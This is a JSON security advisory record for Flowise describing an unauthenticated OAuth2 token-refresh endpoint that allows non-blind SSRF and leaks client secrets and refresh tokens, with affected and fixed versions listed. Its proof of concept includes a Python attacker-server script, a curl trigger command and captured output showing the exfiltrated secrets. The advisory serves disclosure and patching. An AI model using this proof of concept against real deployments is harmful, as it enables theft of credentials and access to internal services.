{"id":"GHSA-r745-8hwv-h473","summary":"Flowise: Unauthenticated OAuth2 Refresh Enables Non-Blind SSRF and Secret Exfiltration","details":"### Summary\n\nThe OAuth2 token refresh endpoint (`POST /api/v1/oauth2-credential/refresh/:credentialId`) is unauthenticated by design (it is in the public whitelist) and performs a server-side HTTP request to a credential-controlled URL (`accessTokenUrl`) without SSRF protections. In runtime validation, this endpoint was reachable without auth, triggered outbound POST requests to an attacker-controlled server, and reflected the full remote response body to the caller (`tokenInfo`), confirming non-blind SSRF and credential secret exfiltration.\n\n### Details\n\nThe vulnerability is in `dist/routes/oauth2/index.js` (container runtime build), under path prefix `/api/v1/oauth2-credential`.\n\nConfirmed in runtime code:\n\n1. **Unauthenticated route via whitelist**\n   - `dist/utils/constants.js` includes:\n     - `/api/v1/oauth2-credential/callback`\n     - `/api/v1/oauth2-credential/refresh`\n   - `dist/index.js` auth middleware uses:\n     - `const isWhitelisted = whitelistURLs.some((url) =\u003e req.path.startsWith(url))`\n   - Therefore `/api/v1/oauth2-credential/refresh/:credentialId` is treated as whitelisted.\n\n2. **User-controlled SSRF target**\n   - In refresh handler (`dist/routes/oauth2/index.js`):\n     - loads credential by `credentialId`\n     - decrypts credential data\n     - reads `accessTokenUrl`\n     - executes:\n       - `axios.post(tokenUrl, new URLSearchParams(refreshRequestData).toString(), ...)`\n   - No `secureAxiosRequest()` / denylist wrapper is used in this path.\n\n3. **Non-blind response reflection**\n   - Response returns:\n     - `tokenInfo: { ...tokenData, ... }`\n   - `tokenData` is the attacker/internal server response body.\n\n4. **Secrets sent to SSRF target**\n   - Request body includes:\n     - `client_id`\n     - `client_secret`\n     - `grant_type=refresh_token`\n     - `refresh_token`\n\n### PoC\n\n#### Environment used\n\n- `flowiseai/flowise:latest` container (`localhost:3000`)\n- Attacker server (`localhost:18081`) returning JSON\n\n#### Step 1: Start attacker server\n\n```bash\npython3 -u - \u003c\u003c'PY'\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport json\n\nclass H(BaseHTTPRequestHandler):\n    def do_POST(self):\n        l = int(self.headers.get('Content-Length','0'))\n        b = self.rfile.read(l).decode('utf-8', errors='replace')\n        print('REQUEST_PATH', self.path, flush=True)\n        print('REQUEST_BODY', b, flush=True)\n        self.send_response(200)\n        self.send_header('Content-Type','application/json')\n        self.end_headers()\n        self.wfile.write(json.dumps({'ok': True, 'source': 'attacker-server', 'echo_len': len(b)}).encode())\n    def log_message(self, fmt, *args):\n        pass\n\nHTTPServer(('0.0.0.0', 18081), H).serve_forever()\nPY\n```\n\n#### Step 2: Create OAuth2 credential with attacker `accessTokenUrl` (authenticated action)\n\nIn validation, this was done via authenticated API path (credential creation requires auth/permissions), then refresh was tested publicly.\n\nResulting credential ID used in runtime validation:\n\n- `24c0b18b-ff6e-4d81-a9a7-26ea8ddccdef`\n\n#### Step 3: Trigger refresh **without auth**\n\n```bash\ncurl -i -X POST \\\n  http://127.0.0.1:3000/api/v1/oauth2-credential/refresh/24c0b18b-ff6e-4d81-a9a7-26ea8ddccdef \\\n  -H 'Content-Type: application/json' \\\n  -d '{}'\n```\n\nObserved response:\n\n```json\n{\n  \"success\": true,\n  \"message\": \"OAuth2 token refreshed successfully\",\n  \"credentialId\": \"24c0b18b-ff6e-4d81-a9a7-26ea8ddccdef\",\n  \"tokenInfo\": {\n    \"ok\": true,\n    \"source\": \"attacker-server\",\n    \"echo_len\": 76,\n    \"has_new_refresh_token\": false\n  }\n}\n```\n\nAttacker server logs captured:\n\n```text\nREQUEST_PATH /token\nREQUEST_BODY client_id=cid2&client_secret=csec2&grant_type=refresh_token&refresh_token=r2\n```\n\nThis confirms:\n- unauthenticated trigger,\n- server-side POST to attacker-controlled URL,\n- exfiltration of OAuth2 secrets in POST body,\n- full response reflection to client (`tokenInfo`).\n\n### Impact\n\n- **Vulnerability class:** Non-blind SSRF + sensitive secret exfiltration.\n- **Who can set up attack:** Any authenticated user who can create/update OAuth2 credentials.\n- **Who can trigger attack:** Anyone who knows a valid OAuth2 credential UUID (refresh endpoint is public/whitelisted).\n- **Technical impact:**\n  - outbound SSRF to attacker/internal targets,\n  - direct leak of `client_secret` and `refresh_token` to SSRF target,\n  - direct response read from target via API response (`tokenInfo`).\n- **Deployment impact:**\n  - cloud/internal network reachability can expose metadata/internal services depending on egress controls.","aliases":["CVE-2026-69250"],"modified":"2026-08-04T14:41:09.018557Z","published":"2026-08-04T14:20:49Z","database_specific":{"github_reviewed_at":"2026-08-04T14:20:49Z","nvd_published_at":null,"cwe_ids":["CWE-639"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-r745-8hwv-h473"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/commit/da8b251a9a4c59484ceaf6f71df7406aede7bef2"},{"type":"PACKAGE","url":"https://github.com/FlowiseAI/Flowise"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/releases/tag/flowise@3.1.3"}],"affected":[{"package":{"name":"flowise","ecosystem":"npm","purl":"pkg:npm/flowise"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.1.3"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.1.2","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-r745-8hwv-h473/GHSA-r745-8hwv-h473.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"}]}